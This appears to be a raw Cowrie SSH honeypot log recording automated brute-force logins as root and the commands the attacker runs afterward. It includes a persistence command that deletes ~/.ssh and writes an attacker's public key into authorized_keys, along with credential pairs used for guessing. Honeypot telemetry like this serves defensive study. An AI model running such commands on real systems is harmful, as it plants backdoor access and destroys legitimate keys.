{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:11:43.969670Z","src_ip":"212.227.235.229","session":"602125190dd6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:11:44.119342Z","src_ip":"212.227.235.229","session":"5f01ba2b84f5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:11:44.120241Z","src_ip":"212.227.235.229","session":"5f01ba2b84f5"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:11:44.240382Z","src_ip":"212.227.235.229","session":"486161196e0e"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:11:44.241308Z","src_ip":"212.227.235.229","session":"602125190dd6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39130,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d440a8e79d0","protocol":"ssh","message":"New connection: 212.227.235.229:39130 (1.2.3.4:22) [session: 3d440a8e79d0]","sensor":"my-vps","timestamp":"2025-08-31T06:11:44.379817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:11:44.380493Z","src_ip":"212.227.235.229","session":"3d440a8e79d0"}
{"eventid":"cowrie.login.success","username":"root","password":"@B0g0r123","message":"login attempt [root/@B0g0r123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:11:44.525241Z","src_ip":"212.227.235.229","session":"75f85fd08d2f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:11:44.641870Z","src_ip":"212.227.235.229","session":"3d440a8e79d0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:11:45.108022Z","src_ip":"212.227.235.229","session":"75f85fd08d2f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:11:45.108749Z","src_ip":"212.227.235.229","session":"75f85fd08d2f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:11:45.109869Z","src_ip":"212.227.235.229","session":"75f85fd08d2f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:11:45.392059Z","src_ip":"212.227.235.229","session":"75f85fd08d2f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:11:45.726591Z","src_ip":"212.227.235.229","session":"3d440a8e79d0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:11:46.016364Z","src_ip":"212.227.235.229","session":"75f85fd08d2f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:11:46.017048Z","src_ip":"212.227.235.229","session":"75f85fd08d2f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:11:46.300099Z","src_ip":"212.227.235.229","session":"75f85fd08d2f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:11:46.301022Z","src_ip":"212.227.235.229","session":"75f85fd08d2f"}
{"eventid":"cowrie.login.failed","username":"lighthouse","password":"lighthouse","message":"login attempt [lighthouse/lighthouse] failed","sensor":"my-vps","timestamp":"2025-08-31T06:11:46.372237Z","src_ip":"212.227.235.229","session":"eee049f72a45"}
{"eventid":"cowrie.session.closed","duration":9.835512399673462,"message":"Connection lost after 9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:11:46.463305Z","src_ip":"212.227.235.229","session":"1ba4f674276b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50118,"dst_ip":"1.2.3.4","dst_port":22,"session":"d67a76ad67dd","protocol":"ssh","message":"New connection: 212.227.235.229:50118 (1.2.3.4:22) [session: d67a76ad67dd]","sensor":"my-vps","timestamp":"2025-08-31T06:11:46.569930Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:11:46.571043Z","src_ip":"212.227.235.229","session":"d67a76ad67dd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:11:46.847390Z","src_ip":"212.227.235.229","session":"d67a76ad67dd"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:11:46.989561Z","src_ip":"212.227.235.229","session":"3d440a8e79d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39822,"dst_ip":"1.2.3.4","dst_port":22,"session":"4aef8957e33c","protocol":"ssh","message":"New connection: 212.227.235.229:39822 (1.2.3.4:22) [session: 4aef8957e33c]","sensor":"my-vps","timestamp":"2025-08-31T06:11:47.231387Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:11:47.232432Z","src_ip":"212.227.235.229","session":"4aef8957e33c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:11:47.475582Z","src_ip":"212.227.235.229","session":"4aef8957e33c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:11:47.998993Z","src_ip":"212.227.235.229","session":"d67a76ad67dd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:11:48.492647Z","src_ip":"212.227.235.229","session":"4aef8957e33c"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:11:48.737828Z","src_ip":"212.227.235.229","session":"5f01ba2b84f5"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:11:48.738817Z","src_ip":"212.227.235.229","session":"4aef8957e33c"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:11:49.277338Z","src_ip":"212.227.235.229","session":"d67a76ad67dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50968,"dst_ip":"1.2.3.4","dst_port":22,"session":"62d816e1b9e6","protocol":"ssh","message":"New connection: 212.227.235.229:50968 (1.2.3.4:22) [session: 62d816e1b9e6]","sensor":"my-vps","timestamp":"2025-08-31T06:11:49.583085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:11:49.584010Z","src_ip":"212.227.235.229","session":"62d816e1b9e6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:11:49.885754Z","src_ip":"212.227.235.229","session":"62d816e1b9e6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:11:51.131929Z","src_ip":"212.227.235.229","session":"62d816e1b9e6"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:11:51.435440Z","src_ip":"212.227.235.229","session":"75f85fd08d2f"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:11:51.436711Z","src_ip":"212.227.235.229","session":"62d816e1b9e6"}
{"eventid":"cowrie.session.closed","duration":"23.7","message":"Connection lost after 23.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:11:52.724996Z","src_ip":"212.227.235.229","session":"eee049f72a45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40156,"dst_ip":"1.2.3.4","dst_port":22,"session":"34cc318058c4","protocol":"ssh","message":"New connection: 212.227.125.160:40156 (1.2.3.4:22) [session: 34cc318058c4]","sensor":"my-vps","timestamp":"2025-08-31T06:11:54.091357Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52912,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a24964edb12","protocol":"ssh","message":"New connection: 212.227.235.229:52912 (1.2.3.4:22) [session: 6a24964edb12]","sensor":"my-vps","timestamp":"2025-08-31T06:11:55.330168Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:11:56.048986Z","src_ip":"212.227.235.229","session":"6a24964edb12"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:11:56.050100Z","src_ip":"212.227.235.229","session":"6a24964edb12"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:11:58.840422Z","src_ip":"212.227.235.229","session":"47ce23009d90"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55548,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e1b4af7e647","protocol":"ssh","message":"New connection: 212.227.235.229:55548 (1.2.3.4:22) [session: 7e1b4af7e647]","sensor":"my-vps","timestamp":"2025-08-31T06:12:00.681522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:12:00.682470Z","src_ip":"212.227.235.229","session":"7e1b4af7e647"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:12:00.897453Z","src_ip":"212.227.235.229","session":"7e1b4af7e647"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49472,"dst_ip":"1.2.3.4","dst_port":22,"session":"7340e5fe51ee","protocol":"ssh","message":"New connection: 212.227.235.229:49472 (1.2.3.4:22) [session: 7340e5fe51ee]","sensor":"my-vps","timestamp":"2025-08-31T06:12:00.955257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:12:00.956369Z","src_ip":"212.227.235.229","session":"7340e5fe51ee"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:12:01.215660Z","src_ip":"212.227.235.229","session":"7340e5fe51ee"}
{"eventid":"cowrie.login.failed","username":"arjun","password":"arjun123","message":"login attempt [arjun/arjun123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:12:01.755261Z","src_ip":"212.227.235.229","session":"7e1b4af7e647"}
{"eventid":"cowrie.login.failed","username":"test4","password":"123456789","message":"login attempt [test4/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T06:12:01.939613Z","src_ip":"212.227.235.229","session":"6a24964edb12"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword1","message":"login attempt [root/P@ssword1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:12:02.286137Z","src_ip":"212.227.235.229","session":"7340e5fe51ee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:12:02.821135Z","src_ip":"212.227.235.229","session":"7340e5fe51ee"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:12:02.821836Z","src_ip":"212.227.235.229","session":"7340e5fe51ee"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:12:02.823030Z","src_ip":"212.227.235.229","session":"7340e5fe51ee"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:12:02.971792Z","src_ip":"212.227.235.229","session":"7e1b4af7e647"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:12:03.082123Z","src_ip":"212.227.235.229","session":"7340e5fe51ee"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:12:04.062621Z","src_ip":"212.227.235.229","session":"7340e5fe51ee"}
